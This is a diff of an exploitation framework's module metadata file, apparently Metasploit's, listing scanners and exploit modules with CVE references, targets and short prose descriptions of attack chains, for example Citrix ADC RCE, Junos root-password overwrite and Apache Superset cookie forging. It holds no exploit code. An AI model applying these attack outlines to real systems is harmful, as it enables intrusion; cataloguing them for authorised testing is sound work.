"description": "This is a generic module which can manipulate Python Flask-based application cookies.\n The Retrieve action will connect to a web server, grab the cookie, and decode it.\n The Resign action will do the same as above, but after decoding it, it will replace\n the contents with that in NEWCOOKIECONTENT, then sign the cookie with SECRET. This\n cookie can then be used in a browser. This is a Ruby based implementation of some\n of the features in the Python project Flask-Unsign.",
"references": [
"URL-https://github.com/Paradoxis/Flask-Unsign"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2023-09-12 15:52:58 +0000",
"path": "/modules/auxiliary/gather/python_flask_cookie_signer.rb",
"is_install_path": true,
"ref_name": "gather/python_flask_cookie_signer",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_gather/qnap_backtrace_admin_hash": {
"name": "QNAP NAS/NVR Administrator Hash Disclosure",
"fullname": "auxiliary/gather/qnap_backtrace_admin_hash",
@@ -21814,6 +22238,66 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_gather/roundcube_auth_file_read": {
"name": "Roundcube TimeZone Authenticated File Disclosure",
"fullname": "auxiliary/gather/roundcube_auth_file_read",
"aliases": [
],
"rank": 300,
"disclosure_date": "2017-11-09",
"type": "auxiliary",
"author": [
"joel <joel @ ndepthsecurity>",
"stonepresto",
"thomascube"
],
"description": "Roundcube Webmail allows unauthorized access to arbitrary files on the host's filesystem, including configuration files.\n This affects all versions from 1.1.0 through version 1.3.2. The attacker must be able to authenticate at the target system\n with a valid username/password as the attack requires an active session.\n\n Tested against version 1.3.2",
"references": [
"EDB-49510",
"URL-https://gist.github.com/thomascube/3ace32074e23fca0e6510e500bd914a1",
"CVE-2017-16651"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2023-08-25 08:59:53 +0000",
"path": "/modules/auxiliary/gather/roundcube_auth_file_read.rb",
"is_install_path": true,
"ref_name": "gather/roundcube_auth_file_read",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_gather/safari_file_url_navigation": {
"name": "Mac OS X Safari file:// Redirection Sandbox Escape",
"fullname": "auxiliary/gather/safari_file_url_navigation",
@@ -22735,7 +23219,7 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2023-04-12 13:09:34 +0000",
"mod_time": "2023-07-14 12:46:26 +0000",
"path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
"is_install_path": true,
"ref_name": "gather/windows_secrets_dump",
@@ -24555,53 +25039,6 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_scanner/elasticsearch/indices_enum": {
"name": "ElasticSearch Indices Enumeration Utility",
"fullname": "auxiliary/scanner/elasticsearch/indices_enum",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Silas Cutler <Silas.Cutler@BlackListThisDomain.com>"
],
"description": "This module enumerates ElasticSearch Indices. It uses the REST API\n in order to make it.",
"references": [
],
"platform": "",
"arch": "",
"rport": 9200,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/elasticsearch/indices_enum.rb",
"is_install_path": true,
"ref_name": "scanner/elasticsearch/indices_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_scanner/emc/alphastor_devicemanager": {
"name": "EMC AlphaStor Device Manager Service",
"fullname": "auxiliary/scanner/emc/alphastor_devicemanager",
@@ -25856,7 +26293,7 @@
"https"
],
"targets": null,
"mod_time": "2023-05-26 15:47:22 +0000",
"mod_time": "2023-08-17 15:29:20 +0000",
"path": "/modules/auxiliary/scanner/http/apache_nifi_version.rb",
"is_install_path": true,
"ref_name": "scanner/http/apache_nifi_version",
@@ -28887,6 +29324,66 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_scanner/http/elasticsearch_memory_disclosure": {
"name": "Elasticsearch Memory Disclosure",
"fullname": "auxiliary/scanner/http/elasticsearch_memory_disclosure",
"aliases": [
],
"rank": 300,
"disclosure_date": "2021-07-21",
"type": "auxiliary",
"author": [
"h00die",
"Eric Howard",
"R0NY"
],
"description": "This module exploits a memory disclosure vulnerability in Elasticsearch\n 7.10.0 to 7.13.3 (inclusive). A user with the ability to submit arbitrary\n queries to Elasticsearch can generate an error message containing previously\n used portions of a data buffer.\n This buffer could contain sensitive information such as Elasticsearch\n documents or authentication details. This vulnerability's output is similar\n to heartbleed.",
"references": [
"EDB-50149",
"CVE-2021-22145",
"URL-https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177"
],
"platform": "",
"arch": "",
"rport": 9200,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2023-09-01 20:14:41 +0000",
"path": "/modules/auxiliary/scanner/http/elasticsearch_memory_disclosure.rb",
"is_install_path": true,
"ref_name": "scanner/http/elasticsearch_memory_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_scanner/http/elasticsearch_traversal": {
"name": "ElasticSearch Snapshot API Directory Traversal",
"fullname": "auxiliary/scanner/http/elasticsearch_traversal",
@@ -28973,7 +29470,7 @@
"https"
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-09-18 06:56:18 +0000",
"path": "/modules/auxiliary/scanner/http/emby_ssrf_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/emby_ssrf_scanner",
@@ -28981,6 +29478,18 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
],
"SideEffects": [
],
"Reliability": [
],
"RelatedModules": [
"auxiliary/scanner/http/emby_version_ssrf"
]
},
"session_types": false,
"needs_cleanup": false
@@ -29021,7 +29530,7 @@
"https"
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-09-18 06:56:18 +0000",
"path": "/modules/auxiliary/scanner/http/emby_version_ssrf.rb",
"is_install_path": true,
"ref_name": "scanner/http/emby_version_ssrf",
@@ -29029,6 +29538,18 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
],
"SideEffects": [
],
"Reliability": [
],
"RelatedModules": [
"auxiliary/scanner/http/emby_ssrf_scanner"
]
},
"session_types": false,
"needs_cleanup": false
@@ -40295,6 +40816,53 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_scanner/ldap/ldap_login": {
"name": "LDAP Login Scanner",
"fullname": "auxiliary/scanner/ldap/ldap_login",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Dean Welch"
],
"description": "This module attempts to login to the LDAP service.",
"references": [
],
"platform": "",
"arch": "",
"rport": 389,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2023-10-02 13:23:15 +0000",
"path": "/modules/auxiliary/scanner/ldap/ldap_login.rb",
"is_install_path": true,
"ref_name": "scanner/ldap/ldap_login",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_scanner/llmnr/query": {
"name": "LLMNR Query",
"fullname": "auxiliary/scanner/llmnr/query",
@@ -41780,6 +42348,60 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_scanner/msmq/cve_2023_21554_queuejumper": {
"name": "CVE-2023-21554 - QueueJumper - MSMQ RCE Check",
"fullname": "auxiliary/scanner/msmq/cve_2023_21554_queuejumper",
"aliases": [
],
"rank": 300,
"disclosure_date": "2023-04-11",
"type": "auxiliary",
"author": [
"Wayne Low",
"Haifei Li",
"Bastian Kanbach <bastian.kanbach@securesystems.de>"
],
"description": "This module checks the provided hosts for the CVE-2023-21554 vulnerability by sending\n a MSMQ message with an altered DataLength field within the SRMPEnvelopeHeader that\n overflows the given buffer. On patched systems, the error is caught and no response\n is sent back. On vulnerable systems, the integer wraps around and depending on the length\n could cause an out-of-bounds write. In the context of this module a response is sent back,\n which indicates that the system is vulnerable.",
"references": [
"CVE-2023-21554",
"URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554",
"URL-https://securityintelligence.com/posts/msmq-queuejumper-rce-vulnerability-technical-analysis/"
],
"platform": "",
"arch": "",
"rport": 1801,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2023-09-05 13:15:36 +0000",
"path": "/modules/auxiliary/scanner/msmq/cve_2023_21554_queuejumper.rb",
"is_install_path": true,
"ref_name": "scanner/msmq/cve_2023_21554_queuejumper",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
],
"AKA": [
"QueueJumper"
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_scanner/mssql/mssql_hashdump": {
"name": "MSSQL Password Hashdump",
"fullname": "auxiliary/scanner/mssql/mssql_hashdump",
@@ -41977,7 +42599,7 @@
"theLightCosine <theLightCosine@metasploit.com>",
"jcran <jcran@metasploit.com>"
],
"description": "This module exploits a password bypass vulnerability in MySQL in order\n to extract the usernames and encrypted password hashes from a MySQL server.\n These hashes are stored as loot for later cracking.",
"description": "This module exploits a password bypass vulnerability in MySQL in order\n to extract the usernames and encrypted password hashes from a MySQL server.\n These hashes are stored as loot for later cracking.\n\n Impacts MySQL versions:\n - 5.1.x before 5.1.63\n - 5.5.x before 5.5.24\n - 5.6.x before 5.6.6\n\n And MariaDB versions:\n - 5.1.x before 5.1.62\n - 5.2.x before 5.2.12\n - 5.3.x before 5.3.6\n - 5.5.x before 5.5.23",
"references": [
"CVE-2012-2122",
"OSVDB-82804",
@@ -41993,7 +42615,7 @@
],
"targets": null,
"mod_time": "2022-01-23 15:28:32 +0000",
"mod_time": "2023-10-12 17:39:47 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_authbypass_hashdump",
@@ -42032,7 +42654,7 @@
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-08-17 19:07:28 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_file_enum.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_file_enum",
@@ -42222,7 +42844,7 @@
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-08-17 19:07:28 +0000",
"path": "/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb",
"is_install_path": true,
"ref_name": "scanner/mysql/mysql_writable_dirs",
@@ -48146,7 +48768,7 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2023-01-24 14:30:39 +0000",
"mod_time": "2023-09-20 13:52:06 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_login.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_login",
@@ -48465,7 +49087,7 @@
"smtps"
],
"targets": null,
"mod_time": "2023-01-04 14:45:58 +0000",
"mod_time": "2023-09-18 19:33:07 +0000",
"path": "/modules/auxiliary/scanner/smtp/smtp_relay.rb",
"is_install_path": true,
"ref_name": "scanner/smtp/smtp_relay",
@@ -49496,7 +50118,7 @@
],
"targets": null,
"mod_time": "2022-04-14 17:27:19 +0000",
"mod_time": "2023-07-25 13:44:47 +0000",
"path": "/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/libssh_auth_bypass",
@@ -49971,7 +50593,7 @@
],
"targets": null,
"mod_time": "2022-11-05 07:23:14 +0000",
"mod_time": "2023-08-28 16:49:31 +0000",
"path": "/modules/auxiliary/scanner/ssl/ssl_version.rb",
"is_install_path": true,
"ref_name": "scanner/ssl/ssl_version",
@@ -51715,7 +52337,7 @@
"winrm"
],
"targets": null,
"mod_time": "2023-01-24 14:30:39 +0000",
"mod_time": "2023-06-14 00:40:33 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_cmd",
@@ -51766,7 +52388,7 @@
"winrm"
],
"targets": null,
"mod_time": "2023-01-24 14:30:39 +0000",
"mod_time": "2023-06-14 00:40:33 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_login.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_login",
@@ -58786,6 +59408,138 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_freebsd/http/citrix_formssso_target_rce": {
"name": "Citrix ADC (NetScaler) Forms SSO Target RCE",
"fullname": "exploit/freebsd/http/citrix_formssso_target_rce",
"aliases": [
],
"rank": 300,
"disclosure_date": "2023-07-18",
"type": "exploit",
"author": [
"Ron Bowes",
"Douglass McKee",
"Spencer McIntyre",
"rwincey"
],
"description": "A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer\n overflow of the nsppe process by making a specially crafted HTTP GET request. Successful exploitation results in\n remote code execution as root.",
"references": [
"CVE-2023-3519",
"URL-https://attackerkb.com/topics/si09VNJhHh/cve-2023-3519",
"URL-https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"Citrix ADC 13.1-48.47",
"Citrix ADC 13.1-37.38",
"Citrix ADC 13.0-91.12",
"Citrix ADC 12.1-65.25",
"Citrix ADC 12.1-64.17"
],
"mod_time": "2023-08-07 12:50:23 +0000",
"path": "/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb",
"is_install_path": true,
"ref_name": "freebsd/http/citrix_formssso_target_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_freebsd/http/junos_phprc_auto_prepend_file": {
"name": "Junos OS PHPRC Environment Variable Manipulation RCE",
"fullname": "exploit/freebsd/http/junos_phprc_auto_prepend_file",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-08-17",
"type": "exploit",
"author": [
"Jacob Baines",
"Ron Bowes",
"jheysel-r7"
],
"description": "This module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls\n and EX switches. The affected Juniper devices run FreeBSD and every FreeBSD process can access their stdin\n by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first being\n 'auto_prepend_file' which causes the provided file to be added using the 'require' function. The second PHP\n function is 'allow_url_include' which allows the use of URL-aware fopen wrappers. By enabling\n allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses\n data:// to provide a file inline which includes the base64 encoded PHP payload.\n\n By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a\n datastore option 'JAIL_BREAK', that when set to true, will steal the necessary tokens from a user authenticated\n to the J-Web application, in order to overwrite the the root password hash. If there is no user\n authenticated to the J-Web application this method will not work. The module then authenticates\n with the new root password over SSH and then rewrites the original root password hash to /etc/master.passwd.",
"references": [
"URL-https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/",
"URL-https://vulncheck.com/blog/juniper-cve-2023-36845",
"URL-https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US",
"CVE-2023-36845"
],
"platform": "PHP,Unix",
"arch": "php, cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHP In-Memory",
"Interactive SSH with jail break"
],
"mod_time": "2023-09-29 11:40:03 +0000",
"path": "/modules/exploits/freebsd/http/junos_phprc_auto_prepend_file.rb",
"is_install_path": true,
"ref_name": "freebsd/http/junos_phprc_auto_prepend_file",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"config-changes"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_freebsd/http/watchguard_cmd_exec": {
"name": "Watchguard XCS Remote Command Execution",
"fullname": "exploit/freebsd/http/watchguard_cmd_exec",
@@ -60042,6 +60796,72 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/apache_airflow_dag_rce": {
"name": "Apache Airflow 1.10.10 - Example DAG Remote Code Execution",
"fullname": "exploit/linux/http/apache_airflow_dag_rce",
"aliases": [
],
"rank": 600,
"disclosure_date": "2020-07-14",
"type": "exploit",
"author": [
"xuxiang",
"Pepe Berba",
"Ismail E. Dawoodjee"
],
"description": "This module exploits an unauthenticated command injection vulnerability\n by combining two critical vulnerabilities in Apache Airflow 1.10.10.\n The first, CVE-2020-11978, is an authenticated command injection vulnerability\n found in one of Airflow's example DAGs, \"example_trigger_target_dag\", which\n allows any authenticated user to run arbitrary OS commands as the user\n running Airflow Worker/Scheduler. The second, CVE-2020-13927, is a default\n setting of Airflow 1.10.10 that allows unauthenticated access to Airflow's\n Experimental REST API to perform malicious actions such as creating the\n vulnerable DAG above. The two CVEs taken together allow vulnerable DAG creation\n and command injection, leading to unauthenticated remote code execution.",
"references": [
"EDB-49927",
"CVE-2020-11978",
"CVE-2020-13927",
"URL-https://github.com/pberba/CVE-2020-11978/",
"URL-https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx",
"URL-https://lists.apache.org/thread/mq1bpqf3ztg1nhyc5qbrjobfrzttwx1d"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix Command"
],
"mod_time": "2023-09-17 22:42:07 +0000",
"path": "/modules/exploits/linux/http/apache_airflow_dag_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/apache_airflow_dag_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/apache_continuum_cmd_exec": {
"name": "Apache Continuum Arbitrary Command Execution",
"fullname": "exploit/linux/http/apache_continuum_cmd_exec",
@@ -60212,6 +61032,70 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/apache_nifi_h2_rce": {
"name": "Apache NiFi H2 Connection String Remote Code Execution",
"fullname": "exploit/linux/http/apache_nifi_h2_rce",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-06-12",
"type": "exploit",
"author": [
"h00die",
"Matei \"Mal\" Badanoiu"
],
"description": "The DBCPConnectionPool and HikariCPConnectionPool Controller Services in\n Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user\n to configure a Database URL with the H2 driver that enables custom code execution.\n\n This exploit will result in several shells (5-7).\n Successfully tested against Apache nifi 1.17.0 through 1.21.0.",
"references": [
"CVE-2023-34468",
"URL-https://lists.apache.org/thread/7b82l4f5blmpkfcynf3y6z4x1vqo59h8",
"URL-https://issues.apache.org/jira/browse/NIFI-11653",
"URL-https://nifi.apache.org/security.html#1.22.0"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix (In-Memory)"
],
"mod_time": "2023-08-28 17:39:02 +0000",
"path": "/modules/exploits/linux/http/apache_nifi_h2_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/apache_nifi_h2_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs",
"config-changes",
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/apache_ofbiz_deserialization": {
"name": "Apache OFBiz XML-RPC Java Deserialization",
"fullname": "exploit/linux/http/apache_ofbiz_deserialization",
@@ -60402,6 +61286,78 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/apache_superset_cookie_sig_rce": {
"name": "Apache Superset Signed Cookie RCE",
"fullname": "exploit/linux/http/apache_superset_cookie_sig_rce",
"aliases": [
],
"rank": 400,
"disclosure_date": "2023-09-06",
"type": "exploit",
"author": [
"h00die",
"paradoxis",
"Spencer McIntyre",
"Naveen Sunkavally"
],
"description": "Apache Superset versions <= 2.0.0 utilize Flask with a known default secret key which is used to sign HTTP cookies.\n These cookies can therefore be forged. If a user is able to login to the site, they can decode the cookie, set their user_id to that\n of an administrator, and re-sign the cookie. This valid cookie can then be used to login as the targeted user. From there the\n Superset database is mounted, and credentials are pulled. A dashboard is then created. Lastly a pickled python payload can be\n set for that dashboard within Superset's database which will trigger the RCE.\n\n An attempt to clean up ALL of the dashboard key values and reset them to their previous values happens during the cleanup phase.",
"references": [
"URL-https://github.com/Paradoxis/Flask-Unsign",
"URL-https://vulcan.io/blog/cve-2023-27524-in-apache-superset-what-you-need-to-know/",
"URL-https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/",
"URL-https://www.horizon3.ai/apache-superset-part-ii-rce-credential-harvesting-and-more/",
"URL-https://github.com/horizon3ai/CVE-2023-27524/blob/main/CVE-2023-27524.py",
"EDB-51447",
"CVE-2023-27524",
"CVE-2023-37941",
"CVE-2023-39265"
],
"platform": "Python",
"arch": "python",
"rport": 8088,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2023-10-10 15:21:35 +0000",
"path": "/modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/apache_superset_cookie_sig_rce",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"config-changes"
],
"RelatedModules": [
"auxiliary/gather/apache_superset_cookie_sig_priv_esc"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection": {
"name": "Artica proxy 4.30.000000 Auth Bypass service-cmds-peform Command Injection",
"fullname": "exploit/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection",
@@ -61271,6 +62227,70 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_linux/http/chamilo_unauth_rce_cve_2023_34960": {
"name": "Chamilo unauthenticated command injection in PowerPoint upload",
"fullname": "exploit/linux/http/chamilo_unauth_rce_cve_2023_34960",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-06-01",
"type": "exploit",
"author": [
"h00die-gr3y <h00die.gr3y@gmail.com>",
"Randorisec"
],
"description": "Chamilo is an e-learning platform, also called Learning Management Systems (LMS).\n This module exploits an unauthenticated remote command execution vulnerability\n that affects Chamilo versions `1.11.18` and below (CVE-2023-34960).\n Due to a functionality called Chamilo Rapid to easily convert PowerPoint\n slides to courses on Chamilo, it is possible for an unauthenticated remote\n attacker to execute arbitrary commands at OS level using a malicious SOAP\n request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.",
"references": [
"CVE-2023-34960",
"URL-https://www.randorisec.fr/pt/chamilo-1.11.18-multiple-vulnerabilities",
"URL-https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960"
],
"platform": "Linux,PHP,Unix",
"arch": "php, cmd, x64, x86, aarch64",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHP",
"Unix Command",
"Linux Dropper"
],
"mod_time": "2023-08-23 11:38:07 +0000",
"path": "/modules/exploits/linux/http/chamilo_unauth_rce_cve_2023_34960.rb",
"is_install_path": true,
"ref_name": "linux/http/chamilo_unauth_rce_cve_2023_34960",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": true
},
"exploit_linux/http/cisco_asax_sfr_rce": {
"name": "Cisco ASA-X with FirePOWER Services Authenticated Command Injection",
"fullname": "exploit/linux/http/cisco_asax_sfr_rce",
@@ -65289,6 +66309,74 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/h2_webinterface_rce": {
"name": "H2 Web Interface Create Alias RCE",
"fullname": "exploit/linux/http/h2_webinterface_rce",
"aliases": [
],
"rank": 600,
"disclosure_date": "2018-04-09",
"type": "exploit",
"author": [
"h00die",
"gambler",
"h4ckNinja",
"Nairuz Abulhul"
],
"description": "The H2 database contains an alias function which allows for arbitrary Java code to be used.\n This functionality can be abused to create an exec functionality to pull our payload down\n and execute it. H2's web interface contains restricts MANY characters, so injecting a payload\n directly is not favorable. A valid database connection is required. If the database engine\n was configured to allow creation of databases, the module default can be used which\n utilizes an in memory database. Some Docker instances of H2 don't allow writing to\n folders such as /tmp, so we default to writing to the working directory of the software.\n\n This module was tested against H2 version 2.1.214, 2.0.204, 1.4.199 (version detection fails)",
"references": [
"EDB-44422",
"EDB-45506",
"URL-https://medium.com/r3d-buck3t/chaining-h2-database-vulnerabilities-for-rce-9b535a9621a2",
"URL-https://www.h2database.com/html/commands.html#create_alias"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8082,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2023-08-08 15:28:34 +0000",
"path": "/modules/exploits/linux/http/h2_webinterface_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/h2_webinterface_rce",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"NOCVE": [
"abusing a feature"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/hadoop_unauth_exec": {
"name": "Hadoop YARN ResourceManager Unauthenticated Command Execution",
"fullname": "exploit/linux/http/hadoop_unauth_exec",
@@ -66019,6 +67107,70 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/ivanti_sentry_misc_log_service": {
"name": "Ivanti Sentry MICSLogService Auth Bypass resulting in RCE (CVE-2023-38035)",
"fullname": "exploit/linux/http/ivanti_sentry_misc_log_service",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-08-21",
"type": "exploit",
"author": [
"Zach Hanley",
"James Horseman",
"jheysel-r7"
],
"description": "This module exploits an authentication bypass in Ivanti Sentry which exposes API functionality which\n allows for code execution in the context of the root user.",
"references": [
"URL-https://github.com/horizon3ai/CVE-2023-38035",
"URL-https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/",
"CVE-2023-38035"
],
"platform": "Linux,Unix",
"arch": "cmd, x64",
"rport": 8443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix (In-Memory)",
"Linux Dropper"
],
"mod_time": "2023-09-12 15:14:10 +0000",
"path": "/modules/exploits/linux/http/ivanti_sentry_misc_log_service.rb",
"is_install_path": true,
"ref_name": "linux/http/ivanti_sentry_misc_log_service",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/jenkins_cli_deserialization": {
"name": "Jenkins CLI Deserialization",
"fullname": "exploit/linux/http/jenkins_cli_deserialization",
@@ -66181,6 +67333,128 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/kibana_timelion_prototype_pollution_rce": {
"name": "Kibana Timelion Prototype Pollution RCE",
"fullname": "exploit/linux/http/kibana_timelion_prototype_pollution_rce",
"aliases": [
],
"rank": 0,
"disclosure_date": "2019-10-30",
"type": "exploit",
"author": [
"h00die",
"Michał Bentkowski",
"Gaetan Ferry"
],
